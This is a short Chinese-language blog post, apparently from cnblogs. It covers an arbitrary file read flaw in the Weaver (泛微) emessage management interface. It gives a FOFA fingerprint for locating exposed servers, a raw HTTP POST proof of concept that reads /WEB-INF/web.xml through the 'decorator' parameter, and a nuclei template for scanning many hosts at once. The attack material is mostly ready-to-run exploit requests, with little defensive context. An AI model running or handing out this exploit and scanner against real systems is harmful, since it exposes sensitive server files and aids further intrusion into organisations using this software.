漏洞简介
泛微 emessage 管理界面存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。
漏洞复现
fofa语法:icon_hash="-1477694668"
登录页面如下:
POC:
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Length: 43
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
decorator=%2FWEB-INF%2Fweb.xml&confirm=true
nuclei批量yaml文件
id: fanwei_emessage_decorator_fileread
info:
name: 泛微emessage管理界面存在任意文件读取漏洞2023
author: mhb17
severity: high
description:
requests:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
decorator=%2FWEB-INF%2Fweb.xml&confirm=true
matchers-condition: and
matchers:
- type: word
part: body
words:
- <servlet-name>
- type: word
part: body
words:
- <?xml
- type: word
part: header
words:
- '200'
标签:emessage,读取,Content,漏洞,537.36,2023,泛微
From: https://www.cnblogs.com/pursue-security/p/17775900.html